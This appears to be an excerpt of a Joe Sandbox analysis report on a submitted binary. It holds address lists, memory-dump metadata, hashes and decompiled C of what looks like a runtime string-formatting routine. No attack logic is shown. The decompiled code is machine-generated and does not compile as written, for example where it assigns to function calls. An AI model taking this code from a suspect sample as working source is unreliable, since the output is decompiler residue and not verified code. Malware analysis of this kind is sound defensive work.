                            0x00000000
                            0x00422306
                            0x00422302
                            0x00421ae7
                            0x00421aed
                            0x00421aed
                            0x00421af4
                            0x00000000
                            0x00421e4e
                            0x00421e4e
                            0x00421e55
                            0x00421e5c
                            0x00421e5c
                            0x00421e5f
                            0x00000000
                            0x00000000
                            0x00421afb
                            0x00421afe
                            0x00421afe
                            0x00421b04
                            0x00421b06
                            0x00421b09
                            0x00421b09
                            0x00421b0e
                            0x00421b0e
                            0x00000000
                            0x00000000
                            0x00421c3b
                            0x00421c3e
                            0x00421c3e
                            0x00421c43
                            0x00421c45
                            0x00421c48
                            0x00421c48
                            0x00421c4e
                            0x00421c4e
                            0x00000000
                            0x00000000
                            0x0042201b
                            0x0042201b
                            0x00000000
                            0x00000000
                            0x00421ba5
                            0x00421ba5
                            0x00421bb1
                            0x00421bb7
                            0x00421bbe
                            0x00421bcc
                            0x00421bcc
                            0x00421bd2
                            0x00421bd5
                            0x00421be1
                            0x00421c36
                            0x00000000
                            0x00421c36
                            0x00421bc0
                            0x00421bc0
                            0x00421bc6
                            0x00421bca
                            0x00421be6
                            0x00421be9
                            0x00421be9
                            0x00421bef
                            0x00421c17
                            0x00421c1e
                            0x00421c24
                            0x00421c27
                            0x00421c2a
                            0x00421c30
                            0x00421c33
                            0x00421bf1
                            0x00421bf1
                            0x00421bf7
                            0x00421bfa
                            0x00421bfd
                            0x00421c03
                            0x00421c06
                            0x00421c09
                            0x00421c0b
                            0x00421c0e
                            0x00421c0e
                            0x00000000
                            0x00421bef
                            0x00000000
                            0x00000000
                            0x00421e65
                            0x00421e68
                            0x00421e6b
                            0x00421e6e
                            0x00421e74
                            0x00421e77
                            0x00421e7e
                            0x00421e82
                            0x00421e8d
                            0x00421e8d
                            0x00421e91
                            0x00421ea8
                            0x00421ea8
                            0x00421eaf
                            0x00421eb1
                            0x00421eb1
                            0x00421eb8
                            0x00421eb8
                            0x00421ebf
                            0x00421ed0
                            0x00421edf
                            0x00421ee2
                            0x00421ee6
                            0x00421efc
                            0x00421ee8
                            0x00421ee8
                            0x00421eeb
                            0x00421ef1
                            0x00421ef7
                            0x00421ef7
                            0x00421ee6
                            0x00421f06
                            0x00421f09
                            0x00421f0c
                            0x00421f0f
                            0x00421f12
                            0x00421f15
                            0x00421f1b
                            0x00421f21
                            0x00421f29
                            0x00421f2a
                            0x00421f2d
                            0x00421f2e
                            0x00421f31
                            0x00421f32
                            0x00421f39
                            0x00421f3a
                            0x00421f3d
                            0x00421f3e
                            0x00421f41
                            0x00421f42
                            0x00421f48
                            0x00421f49
                            0x00421f57
                            0x00421f59
                            0x00421f5f
                            0x00421f5f
                            0x00421f65
                            0x00421f67
                            0x00421f6b
                            0x00421f6d
                            0x00421f75
                            0x00421f76
                            0x00421f79
                            0x00421f7a
                            0x00421f88
                            0x00421f8a
                            0x00421f8a
                            0x00421f6b
                            0x00421f8d
                            0x00421f94
                            0x00421f97
                            0x00421f9c
                            0x00421f9c
                            0x00421fa2
                            0x00421fa4
                            0x00421fac
                            0x00421fad
                            0x00421fb0
                            0x00421fb1
                            0x00421fc0
                            0x00421fc2
                            0x00421fc2
                            0x00421fa2
                            0x00421fc5
                            0x00421fc8
                            0x00421fcb
                            0x00421fce
                            0x00421fd3
                            0x00421fd9
                            0x00421fdc
                            0x00421fdf
                            0x00421fdf
                            0x00421fe2
                            0x00421fe2
                            0x00421fe5
                            0x00421ff1
                            0x00422302
                            0x00422302
                            0x00422302
                            0x00422306
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00422306
                            0x00000000
                            0x00422302
                            0x00421e93
                            0x00421e93
                            0x00421e9a
                            0x00421e9d
                            0x00000000
                            0x00000000
                            0x00421e9f
                            0x00421e9f
                            0x00000000
                            0x00421e9f
                            0x00421e84
                            0x00421e84
                            0x00000000
                            0x00000000
                            0x00421b11
                            0x00421b14
                            0x00421b14
                            0x00421b1a
                            0x00421b75
                            0x00421b7d
                            0x00421b84
                            0x00421b8a
                            0x00421b90
                            0x00421b1c
                            0x00421b1c
                            0x00421b26
                            0x00421b2a
                            0x00421b32
                            0x00421b39
                            0x00421b46
                            0x00421b4d
                            0x00421b59
                            0x00421b5f
                            0x00421b66
                            0x00421b68
                            0x00421b68
                            0x00421b6f
                            0x00421b97
                            0x00421b9d
                            0x00422302
                            0x00422302
                            0x00422302
                            0x00422306
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00422306
                            0x00000000
                            0x00421ff9
                            0x00421ffc
                            0x00421fff
                            0x00422002
                            0x00000000
                            0x00000000
                            0x00421d57
                            0x00421d57
                            0x00421d63
                            0x00421d69
                            0x00421d6e
                            0x00421d70
                            0x00421e1a
                            0x00421e1d
                            0x00421e1d
                            0x00421e20
                            0x00421e34
                            0x00421e3a
                            0x00421e40
                            0x00421e22
                            0x00421e22
                            0x00421e2f
                            0x00421e2f
                            0x00421e42
                            0x00422302
                            0x00422302
                            0x00422302
                            0x00422306
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00422306
                            0x00422302
                            0x00421d76
                            0x00421d76
                            0x00421d76
                            0x00421d78
                            0x00421d86
                            0x00421d7a
                            0x00421d7a
                            0x00421d7a
                            0x00421d90
                            0x00421d96
                            0x00421d9c
                            0x00421da3
                            0x00421da5
                            0x00421daa
                            0x00421dac
                            0x00421db1
                            0x00421db6
                            0x00421db8
                            0x00421dbd
                            0x00421dc0
                            0x00421dc3
                            0x00421dc5
                            0x00421dc5
                            0x00421dc3
                            0x00421dc6
                            0x00421dcd
                            0x00421e15
                            0x00422302
                            0x00422302
                            0x00422302
                            0x00422306
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00422306
                            0x00421dcf
                            0x00421dcf
                            0x00421dd4
                            0x00421df0
                            0x00421df8
                            0x00421e02
                            0x00421e05
                            0x00421e0a
                            0x00000000
                            0x00421e0a
                            0x00000000
                            0x0042205c
                            0x0042205c
                            0x00422066
                            0x00422066
                            0x0042206c
                            0x0042206e
                            0x00422071
                            0x00422071
                            0x00422077
                            0x00422077
                            0x0042207a
                            0x0042207d
                            0x0042207d
                            0x00422082
                            0x004220a4
                            0x004220a4
                            0x004220aa
                            0x004220cc
                            0x004220cc
                            0x004220cf
                            0x00422116
                            0x00422116
                            0x00422119
                            0x00422136
                            0x0042213a
                            0x00422142
                            0x00422142
                            0x00422144
                            0x0042214a
                            0x0042211b
                            0x0042211b
                            0x0042211f
                            0x00422127
                            0x00422128
                            0x0042212e
                            0x0042212e
                            0x004220d1
                            0x004220d4
                            0x004220d4
                            0x004220d7
                            0x004220f5
                            0x00422101
                            0x00422104
                            0x00422105
                            0x0042210b
                            0x004220d9
                            0x004220d9
                            0x004220dd
                            0x004220e5
                            0x004220e6
                            0x004220e7
                            0x004220ed
                            0x004220ed
                            0x00422111
                            0x004220ac
                            0x004220ac
                            0x004220b8
                            0x004220be
                            0x004220be
                            0x00422084
                            0x00422084
                            0x00422090
                            0x00422096
                            0x00422096
                            0x00422153
                            0x00422153
                            0x00422156
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00421c51
                            0x00421c51
                            0x00421c55
                            0x00421c63
                            0x00421c66
                            0x00421c57
                            0x00421c57
                            0x00421c57
                            0x00421c6c
                            0x00421c72
                            0x00421c78
                            0x00421c84
                            0x00421c8a
                            0x00421c8a
                            0x00421c90
                            0x00421cf7
                            0x00421cf7
                            0x00421cfb
                            0x00421cfd
                            0x00421d03
                            0x00421d03
                            0x00421d06
                            0x00421d09
                            0x00421d0f
                            0x00421d0f
                            0x00421d0f
                            0x00421d1b
                            0x00421d1e
                            0x00421d24
                            0x00421d26
                            0x00000000
                            0x00000000
                            0x00421d28
                            0x00421d28
                            0x00421d2e
                            0x00421d31
                            0x00421d33
                            0x00000000
                            0x00000000
                            0x00421d35
                            0x00421d3b
                            0x00421d3e
                            0x00421d3e
                            0x00421d46
                            0x00421d46
                            0x00421d4c
                            0x00421d4c
                            0x00421d4f
                            0x00000000
                            0x00421c92
                            0x00421c92
                            0x00421c92
                            0x00421c96
                            0x00421c98
                            0x00421c9d
                            0x00421c9d
                            0x00421ca0
                            0x00421ca7
                            0x00421caa
                            0x00421cb0
                            0x00421cb0
                            0x00421cb0
                            0x00421cbc
                            0x00421cbf
                            0x00421cc5
                            0x00421cc7
                            0x00000000
                            0x00000000
                            0x00421cc9
                            0x00421cc9
                            0x00421ccf
                            0x00421cd2
                            0x00421cd4
                            0x00000000
                            0x00000000
                            0x00421cd6
                            0x00421cdc
                            0x00421cdf
                            0x00421cdf
                            0x00421ce7
                            0x00421ced
                            0x00421cf0
                            0x00421cf2
                            0x00421d52
                            0x00422302
                            0x00422302
                            0x00422302
                            0x00422306
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00422306
                            0x00422302
                            0x00000000
                            0x0042200b
                            0x0042200b
                            0x0042207a
                            0x0042207a
                            0x0042207d
                            0x0042207d
                            0x00422082
                            0x004220a4
                            0x004220a4
                            0x004220aa
                            0x004220cc
                            0x004220cc
                            0x004220cf
                            0x00422116
                            0x00422116
                            0x00422119
                            0x00422136
                            0x0042213a
                            0x00422142
                            0x00422142
                            0x00422144
                            0x0042214a
                            0x0042211b
                            0x0042211b
                            0x0042211f
                            0x00422127
                            0x00422128
                            0x0042212e
                            0x0042212e
                            0x004220d1
                            0x004220d4
                            0x004220d4
                            0x004220d7
                            0x004220f5
                            0x00422101
                            0x00422104
                            0x00422105
                            0x0042210b
                            0x004220d9
                            0x004220d9
                            0x004220dd
                            0x004220e5
                            0x004220e6
                            0x004220e7
                            0x004220ed
                            0x004220ed
                            0x00422111
                            0x004220ac
                            0x004220ac
                            0x004220b8
                            0x004220be
                            0x004220be
                            0x00422084
                            0x00422084
                            0x00422090
                            0x00422096
                            0x00422096
                            0x00422153
                            0x00422153
                            0x00422156
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00422156
                            0x00000000
                            0x00422027
                            0x00422027
                            0x00422031
                            0x00422031
                            0x0042203b
                            0x0042203b
                            0x00422041
                            0x00422043
                            0x0042204d
                            0x0042204d
                            0x00422050
                            0x00422053
                            0x00422053
                            0x0042207a
                            0x0042207a
                            0x0042207d
                            0x0042207d
                            0x00422082
                            0x004220a4
                            0x004220a4
                            0x004220aa
                            0x004220cc
                            0x004220cc
                            0x004220cf
                            0x00422116
                            0x00422116
                            0x00422119
                            0x00422136
                            0x0042213a
                            0x00422142
                            0x00422142
                            0x00422144
                            0x0042214a
                            0x0042211b
                            0x0042211b
                            0x0042211f
                            0x00422127
                            0x00422128
                            0x0042212e
                            0x0042212e
                            0x004220d1
                            0x004220d4
                            0x004220d4
                            0x004220d7
                            0x004220f5
                            0x00422101
                            0x00422104
                            0x00422105
                            0x0042210b
                            0x004220d9
                            0x004220d9
                            0x004220dd
                            0x004220e5
                            0x004220e6
                            0x004220e7
                            0x004220ed
                            0x004220ed
                            0x00422111
                            0x004220ac
                            0x004220ac
                            0x004220b8
                            0x004220be
                            0x004220be
                            0x00422084
                            0x00422084
                            0x00422090
                            0x00422096
                            0x00422096
                            0x00422153
                            0x00422153
                            0x00422156
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00422156
                            0x00000000
                            0x00422302
                            0x00422302
                            0x00422302
                            0x00422306
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00422306
                            0x00000000
                            0x00000000
                            0x004218c1
                            0x004218c4
                            0x004218c7
                            0x00000000
                            0x00000000
                            0x004218cc
                            0x004218cf
                            0x004218d4
                            0x00000000
                            0x00000000
                            0x004218b6
                            0x004218b6
                            0x004218b9
                            0x004218bc
                            0x00000000
                            0x00000000
                            0x004218ab
                            0x004218ae
                            0x004218b1
                            0x00000000
                            0x00000000
                            0x004218d9
                            0x004218d9
                            0x004218dc
                            0x004218dc
                            0x004218df
                            0x00000000
                            0x00000000
                            0x004218e2
                            0x00000000
                            0x00000000
                            0x0042167e
                            0x00421680
                            0x0042168e
                            0x00421682
                            0x00421682
                            0x00421682
                            0x00421698
                            0x0042169e
                            0x004216ab
                            0x004216ad
                            0x004216b2
                            0x004216b4
                            0x004216b9
                            0x004216be
                            0x004216c0
                            0x004216c5
                            0x004216cb
                            0x004216cd
                            0x004216cd
                            0x004216cb
                            0x004216ce
                            0x004216d5
                            0x00000000
                            0x004216d7
                            0x004216dc
                            0x004216f8
                            0x00421700
                            0x0042170d
                            0x00421712
                            0x004225d1
                            0x004225de
                            0x004225de
                            0x004216d5
                            0x00421678
                            0x0042250d
                            0x0042250d
                            0x00422514
                            0x0042252b
                            0x0042252b
                            0x00422535
                            0x00422535
                            0x0042253b
                            0x00422541
                            0x00422548
                            0x0042254a
                            0x0042254f
                            0x00422551
                            0x00422556
                            0x0042255b
                            0x0042255d
                            0x00422562
                            0x00422565
                            0x00422568
                            0x0042256a
                            0x0042256a
                            0x00422568
                            0x0042256b
                            0x00422572
                            0x004225bd
                            0x004225c6
                            0x004225cb
                            0x00422574
                            0x00422579
                            0x00422595
                            0x0042259d
                            0x004225aa
                            0x004225af
                            0x004225af
                            0x00000000
                            0x00422572
                            0x00422516
                            0x00422516
                            0x0042251d
                            0x00000000
                            0x00000000
                            0x0042251f
                            0x0042251f
                            0x00000000
                            0x0042251f
                            0x00422302
                            0x004222d9
                            0x004222d9
                            0x004222dd
                            0x004222ea
                            0x004222ed
                            0x004222f0
                            0x004222f3
                            0x004222f6
                            0x004222f9
                            0x004222fc
                            0x004222fc
                            0x004222ff
                            0x00000000
                            0x004222ff
                            0x004222df
                            0x004222df
                            0x004222e2
                            0x004222e5
                            0x004222e8
                            0x00000000
                            0x00000000
                            0x00000000
                            0x004222e8
                            0x00422241
                            0x00422241
                            0x00422244
                            0x00422247
                            0x0042224e
                            0x00422255
                            0x0042225d
                            0x00422263
                            0x00422266
                            0x00422269
                            0x00422270
                            0x0042227c
                            0x00422282
                            0x00422288
                            0x0042228f
                            0x00422291
                            0x00422297
                            0x00422297
                            0x0042229d
                            0x0042229d
                            0x004222a3
                            0x004222a6
                            0x004222ac
                            0x004222b1
                            0x004222b4
                            0x00422223
                            0x00422223
                            0x00422229
                            0x0042222c
                            0x0042222f
                            0x00422231
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00422231
                            0x00422223
                            0x00422163
                            0x00422163
                            0x0042216a
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00422198
                            0x00422198
                            0x0042219e
                            0x004221a4
                            0x004221aa
                            0x00000000
                            0x004221aa
                            0x0042207a
                            0x00422031
                            0x0042201b

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.254379313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.254298173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.254460883.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255654257.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255687103.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255765961.0000000000635000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_mzQcZawXvh.jbxd
                            Similarity
                            • API ID: __aulldiv__aullrem_get_int64_arg
                            • String ID: 0$9
                            • API String ID: 3120068967-1975997740
                            • Opcode ID: e9df7b2af13697c2032f7639700437f916cfe39d688a2a21f1aaa362067f392f
                            • Instruction ID: cfbd0fd6fc58c188fc7cebbfc3ed5d0df2ef5efbec001edffb74f6817c75a935
                            • Opcode Fuzzy Hash: e9df7b2af13697c2032f7639700437f916cfe39d688a2a21f1aaa362067f392f
                            • Instruction Fuzzy Hash: 6B4104B1E05229EFDB24CF88DD89BAEBBB5BB44300F5081DAD408A7240C7795E81CF55
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 73%
                            			E004238C9(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi) {
                            				signed int _t483;
                            				void* _t488;
                            				signed int _t490;
                            				void* _t498;
                            				intOrPtr _t501;
                            				signed int _t519;
                            				intOrPtr _t523;
                            				intOrPtr _t524;
                            				signed int _t525;
                            				void* _t527;
                            
                            				L0:
                            				while(1) {
                            					L0:
                            					_t524 = __esi;
                            					_t523 = __edi;
                            					_t501 = __ebx;
                            					 *((intOrPtr*)(_t525 - 0x460)) = 0x27;
                            					while(1) {
                            						L145:
                            						 *(__ebp - 8) = 0x10;
                            						 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
                            						__eflags =  *(__ebp - 0x10) & 0x00000080;
                            						if(( *(__ebp - 0x10) & 0x00000080) != 0) {
                            							__edx = 0x30;
                            							 *(__ebp - 0x14) = __dx;
                            							 *(__ebp - 0x460) =  *(__ebp - 0x460) + 0x51;
                            							__eflags =  *(__ebp - 0x460) + 0x51;
                            							 *(__ebp - 0x12) = __ax;
                            							 *(__ebp - 0x1c) = 2;
                            						}
                            						while(1) {
                            							L150:
                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
                            							__eflags =  *(__ebp - 0x10) & 0x00008000;
                            							if(( *(__ebp - 0x10) & 0x00008000) == 0) {
                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
                            								__eflags =  *(__ebp - 0x10) & 0x00001000;
                            								if(( *(__ebp - 0x10) & 0x00001000) == 0) {
                            									 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
                            									__eflags =  *(__ebp - 0x10) & 0x00000020;
                            									if(( *(__ebp - 0x10) & 0x00000020) == 0) {
                            										 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
                            										__eflags =  *(__ebp - 0x10) & 0x00000040;
                            										if(( *(__ebp - 0x10) & 0x00000040) == 0) {
                            											__ecx = __ebp + 0x14;
                            											__eax = E0041C290(__ebp + 0x14);
                            											__edx = 0;
                            											__eflags = 0;
                            											 *(__ebp - 0x4a0) = __eax;
                            											 *(__ebp - 0x49c) = 0;
                            										} else {
                            											__eax = __ebp + 0x14;
                            											__eax = E0041C290(__ebp + 0x14);
                            											asm("cdq");
                            											 *(__ebp - 0x4a0) = __eax;
                            											 *(__ebp - 0x49c) = __edx;
                            										}
                            									} else {
                            										 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
                            										__eflags =  *(__ebp - 0x10) & 0x00000040;
                            										if(( *(__ebp - 0x10) & 0x00000040) == 0) {
                            											__ecx = __ebp + 0x14;
                            											E0041C290(__ebp + 0x14) = __ax & 0x0000ffff;
                            											asm("cdq");
                            											 *(__ebp - 0x4a0) = __ax & 0x0000ffff;
                            											 *(__ebp - 0x49c) = __edx;
                            										} else {
                            											__eax = __ebp + 0x14;
                            											__eax = E0041C290(__ebp + 0x14);
                            											__ax = __eax;
                            											asm("cdq");
                            											 *(__ebp - 0x4a0) = __eax;
                            											 *(__ebp - 0x49c) = __edx;
                            										}
                            									}
                            								} else {
                            									__eax = __ebp + 0x14;
                            									 *(__ebp - 0x4a0) = E0041C2B0(__ebp + 0x14);
                            									 *(__ebp - 0x49c) = __edx;
                            								}
                            							} else {
                            								__ecx = __ebp + 0x14;
                            								 *(__ebp - 0x4a0) = E0041C2B0(__ebp + 0x14);
                            								 *(__ebp - 0x49c) = __edx;
                            							}
                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
                            							__eflags =  *(__ebp - 0x10) & 0x00000040;
                            							if(( *(__ebp - 0x10) & 0x00000040) == 0) {
                            								goto L167;
                            							}
                            							L163:
                            							__eflags =  *(__ebp - 0x49c);
                            							if(__eflags > 0) {
                            								goto L167;
                            							}
                            							L164:
                            							if(__eflags < 0) {
                            								L166:
                            								 *(__ebp - 0x4a0) =  ~( *(__ebp - 0x4a0));
                            								__edx =  *(__ebp - 0x49c);
                            								asm("adc edx, 0x0");
                            								__edx =  ~( *(__ebp - 0x49c));
                            								 *(__ebp - 0x4a8) =  ~( *(__ebp - 0x4a0));
                            								 *(__ebp - 0x4a4) =  ~( *(__ebp - 0x49c));
                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
                            								L168:
                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
                            								__eflags =  *(__ebp - 0x10) & 0x00008000;
                            								if(( *(__ebp - 0x10) & 0x00008000) == 0) {
                            									 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
                            									__eflags =  *(__ebp - 0x10) & 0x00001000;
                            									if(( *(__ebp - 0x10) & 0x00001000) == 0) {
                            										__edx =  *(__ebp - 0x4a8);
                            										__eax =  *(__ebp - 0x4a4);
                            										__eax =  *(__ebp - 0x4a4) & 0x00000000;
                            										__eflags = __eax;
                            										 *(__ebp - 0x4a4) = __eax;
                            									}
                            								}
                            								__eflags =  *(__ebp - 0x30);
                            								if( *(__ebp - 0x30) >= 0) {
                            									 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xfffffff7;
                            									 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xfffffff7;
                            									__eflags =  *(__ebp - 0x30) - 0x200;
                            									if( *(__ebp - 0x30) > 0x200) {
                            										 *(__ebp - 0x30) = 0x200;
                            									}
                            								} else {
                            									 *(__ebp - 0x30) = 1;
                            								}
                            								 *(__ebp - 0x4a8) =  *(__ebp - 0x4a8) |  *(__ebp - 0x4a4);
                            								__eflags =  *(__ebp - 0x4a8) |  *(__ebp - 0x4a4);
                            								if(( *(__ebp - 0x4a8) |  *(__ebp - 0x4a4)) == 0) {
                            									 *(__ebp - 0x1c) = 0;
                            								}
                            								__eax = __ebp - 0x249;
                            								 *(__ebp - 4) = __ebp - 0x249;
                            								while(1) {
                            									L178:
                            									__ecx =  *(__ebp - 0x30);
                            									 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                            									 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                            									__eflags =  *(__ebp - 0x30);
                            									if( *(__ebp - 0x30) > 0) {
                            										goto L180;
                            									}
                            									L179:
                            									 *(__ebp - 0x4a8) =  *(__ebp - 0x4a8) |  *(__ebp - 0x4a4);
                            									__eflags =  *(__ebp - 0x4a8) |  *(__ebp - 0x4a4);
                            									if(( *(__ebp - 0x4a8) |  *(__ebp - 0x4a4)) == 0) {
                            										L183:
                            										__ebp - 0x249 = __ebp - 0x249 -  *(__ebp - 4);
                            										 *(__ebp - 0x24) = __ebp - 0x249 -  *(__ebp - 4);
                            										__ecx =  *(__ebp - 4);
                            										__ecx =  *(__ebp - 4) + 1;
                            										 *(__ebp - 4) = __ecx;
                            										 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000200;
                            										__eflags =  *(__ebp - 0x10) & 0x00000200;
                            										if(( *(__ebp - 0x10) & 0x00000200) == 0) {
                            											while(1) {
                            												L187:
                            												__eflags =  *(__ebp - 0x28);
                            												if( *(__ebp - 0x28) != 0) {
                            													goto L212;
                            												}
                            												L188:
                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
                            												__eflags =  *(__ebp - 0x10) & 0x00000040;
                            												if(( *(__ebp - 0x10) & 0x00000040) != 0) {
                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000100;
                            													__eflags =  *(__ebp - 0x10) & 0x00000100;
                            													if(( *(__ebp - 0x10) & 0x00000100) == 0) {
                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000001;
                            														__eflags =  *(__ebp - 0x10) & 0x00000001;
                            														if(( *(__ebp - 0x10) & 0x00000001) == 0) {
                            															 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000002;
                            															__eflags =  *(__ebp - 0x10) & 0x00000002;
                            															if(( *(__ebp - 0x10) & 0x00000002) != 0) {
                            																__edx = 0x20;
                            																 *(__ebp - 0x14) = __dx;
                            																 *(__ebp - 0x1c) = 1;
                            															}
                            														} else {
                            															__eax = 0x2b;
                            															 *(__ebp - 0x14) = __ax;
                            															 *(__ebp - 0x1c) = 1;
                            														}
                            													} else {
                            														__ecx = 0x2d;
                            														 *(__ebp - 0x14) = __cx;
                            														 *(__ebp - 0x1c) = 1;
                            													}
                            												}
                            												 *(__ebp - 0x18) =  *(__ebp - 0x18) -  *(__ebp - 0x24);
                            												__eax =  *(__ebp - 0x18) -  *(__ebp - 0x24) -  *(__ebp - 0x1c);
                            												 *(__ebp - 0x4ac) =  *(__ebp - 0x18) -  *(__ebp - 0x24) -  *(__ebp - 0x1c);
                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x0000000c;
                            												__eflags =  *(__ebp - 0x10) & 0x0000000c;
                            												if(( *(__ebp - 0x10) & 0x0000000c) == 0) {
                            													__edx = __ebp - 0x44c;
                            													__eax =  *(__ebp + 8);
                            													__ecx =  *(__ebp - 0x4ac);
                            													__eax = E00423FF0(0x20,  *(__ebp - 0x4ac),  *(__ebp + 8), __ebp - 0x44c);
                            												}
                            												__edx = __ebp - 0x44c;
                            												__eax =  *(__ebp + 8);
                            												__ecx =  *(__ebp - 0x1c);
                            												__edx = __ebp - 0x14;
                            												E00424030( *(__ebp - 0x1c), __ebp - 0x14,  *(__ebp - 0x1c),  *(__ebp + 8), __ebp - 0x44c) =  *(__ebp - 0x10);
                            												__eax =  *(__ebp - 0x10) & 0x00000008;
                            												__eflags =  *(__ebp - 0x10) & 0x00000008;
                            												if(( *(__ebp - 0x10) & 0x00000008) != 0) {
                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000004;
                            													__eflags =  *(__ebp - 0x10) & 0x00000004;
                            													if(( *(__ebp - 0x10) & 0x00000004) == 0) {
                            														__edx = __ebp - 0x44c;
                            														__eax =  *(__ebp + 8);
                            														__ecx =  *(__ebp - 0x4ac);
                            														__eax = E00423FF0(0x30,  *(__ebp - 0x4ac),  *(__ebp + 8), __ebp - 0x44c);
                            													}
                            												}
                            												__eflags =  *(__ebp - 0xc);
                            												if( *(__ebp - 0xc) != 0) {
                            													L208:
                            													__edx = __ebp - 0x44c;
                            													__eax =  *(__ebp + 8);
                            													__ecx =  *(__ebp - 0x24);
                            													__edx =  *(__ebp - 4);
                            													__eax = E00424030(__ecx,  *(__ebp - 4), __ecx,  *(__ebp + 8), __ebp - 0x44c);
                            													goto L209;
                            												} else {
                            													L201:
                            													__eflags =  *(__ebp - 0x24);
                            													if( *(__ebp - 0x24) <= 0) {
                            														goto L208;
                            													}
                            													L202:
                            													__edx =  *(__ebp - 4);
                            													 *(__ebp - 0x4b0) =  *(__ebp - 4);
                            													__eax =  *(__ebp - 0x24);
                            													 *(__ebp - 0x4b4) =  *(__ebp - 0x24);
                            													while(1) {
                            														L203:
                            														__ecx =  *(__ebp - 0x4b4);
                            														 *(__ebp - 0x4b4) =  *(__ebp - 0x4b4) - 1;
                            														 *(__ebp - 0x4b4) =  *(__ebp - 0x4b4) - 1;
                            														__eflags = __ecx;
                            														if(__ecx <= 0) {
                            															break;
                            														}
                            														L204:
                            														__ecx = __ebp - 0x40;
                            														__eax = E0040D3B0(__ebp - 0x40);
                            														__ecx = __ebp - 0x40;
                            														E0040D3B0(__ebp - 0x40) =  *__eax;
                            														__ecx =  *(__ebp - 0x458 + 0xac);
                            														__edx =  *(__ebp - 0x4b0);
                            														__eax = __ebp - 0x458;
                            														 *(__ebp - 0x4b8) = E00419150(__ebp - 0x458,  *(__ebp - 0x4b0),  *(__ebp - 0x458 + 0xac), __ebp - 0x458);
                            														__eflags =  *(__ebp - 0x4b8);
                            														if( *(__ebp - 0x4b8) > 0) {
                            															L206:
                            															__ecx = __ebp - 0x44c;
                            															__edx =  *(__ebp + 8);
                            															 *(__ebp - 0x458) & 0x0000ffff = E00423F90( *(__ebp - 0x458) & 0x0000ffff,  *(__ebp + 8), __ebp - 0x44c);
                            															 *(__ebp - 0x4b0) =  *(__ebp - 0x4b0) +  *(__ebp - 0x4b8);
                            															 *(__ebp - 0x4b0) =  *(__ebp - 0x4b0) +  *(__ebp - 0x4b8);
                            															continue;
                            														}
                            														L205:
                            														 *(__ebp - 0x44c) = 0xffffffff;
                            														break;
                            													}
                            													L207:
                            													L209:
                            													__eflags =  *(__ebp - 0x44c);
                            													if( *(__ebp - 0x44c) >= 0) {
                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000004;
                            														__eflags =  *(__ebp - 0x10) & 0x00000004;
                            														if(( *(__ebp - 0x10) & 0x00000004) != 0) {
                            															__ecx = __ebp - 0x44c;
                            															__edx =  *(__ebp + 8);
                            															 *(__ebp - 0x4ac) = E00423FF0(0x20,  *(__ebp - 0x4ac),  *(__ebp + 8), __ebp - 0x44c);
                            														}
                            													}
                            												}
                            												L212:
                            												__eflags =  *(__ebp - 0x20);
                            												if( *(__ebp - 0x20) != 0) {
                            													__ecx =  *(__ebp - 0x20);
                            													__eax = L0040C240( *(__ebp - 0x20), 2);
                            													 *(__ebp - 0x20) = 0;
                            												}
                            												while(1) {
                            													L214:
                            													 *(_t525 - 0x454) =  *((intOrPtr*)( *((intOrPtr*)(_t525 + 0xc))));
                            													_t502 =  *(_t525 - 0x454) & 0x0000ffff;
                            													 *((intOrPtr*)(_t525 + 0xc)) =  *((intOrPtr*)(_t525 + 0xc)) + 2;
                            													if(( *(_t525 - 0x454) & 0x0000ffff) == 0 ||  *(_t525 - 0x44c) < 0) {
                            														break;
                            													} else {
                            														if(( *(_t525 - 0x454) & 0x0000ffff) < 0x20 || ( *(_t525 - 0x454) & 0x0000ffff) > 0x78) {
                            															 *(_t525 - 0x4d8) = 0;
                            														} else {
